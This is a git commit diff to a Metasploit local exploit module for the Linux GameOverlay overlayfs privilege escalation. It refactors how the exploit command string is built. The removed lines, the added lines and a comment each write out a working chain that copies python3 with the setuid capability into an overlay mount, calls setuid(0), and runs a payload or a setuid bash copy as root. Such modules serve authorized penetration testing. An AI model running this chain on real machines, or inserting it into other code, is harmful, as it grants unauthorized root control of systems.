Break out command building to make it easier to read

Update modules/exploits/linux/local/gameoverlay_privesc.rb

Co-authored-by: Brendan <[email protected]>

Author: gardnerapp

modules/exploits/linux/local/gameoverlay_privesc.rb

@@ -6,7 +6,6 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::FileDropper
 
-
   def initialize(info = {})
     super(
       update_info(
@@ -157,18 +156,25 @@ def exploit
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
 
     # Exploit overlayfs vuln
-    hack =  "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; 
-    mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\""
-    
-
-    print_status "Running exploit:\n'#{hack}'\n"
-    print_status(cmd_exec_with_result(hack).to_s)
-
-    # Trigger payload
-    trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}"
-
-    print_status "Triggering payload: #{trigger}"
-    print_status(cmd_exec_with_result(trigger).to_s)
+    # Build the command
+
+    exploit_cmd = 'unshare -rm sh -c "'
+    exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; "
+    exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; "
+    exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && "
+    exploit_cmd << "touch #{merge_dir}*; \" && "
+    exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system("
+    exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
+    exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD
+    exploit_cmd << "#{bash_copy} -p -c "
+    exploit_cmd << payload_cmd
+    exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
+    exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"
+
+    vprint_status(exploit_cmd.to_s)
+
+    output = cmd_exec(exploit_cmd)
+    print_status(output)
   end
 
 end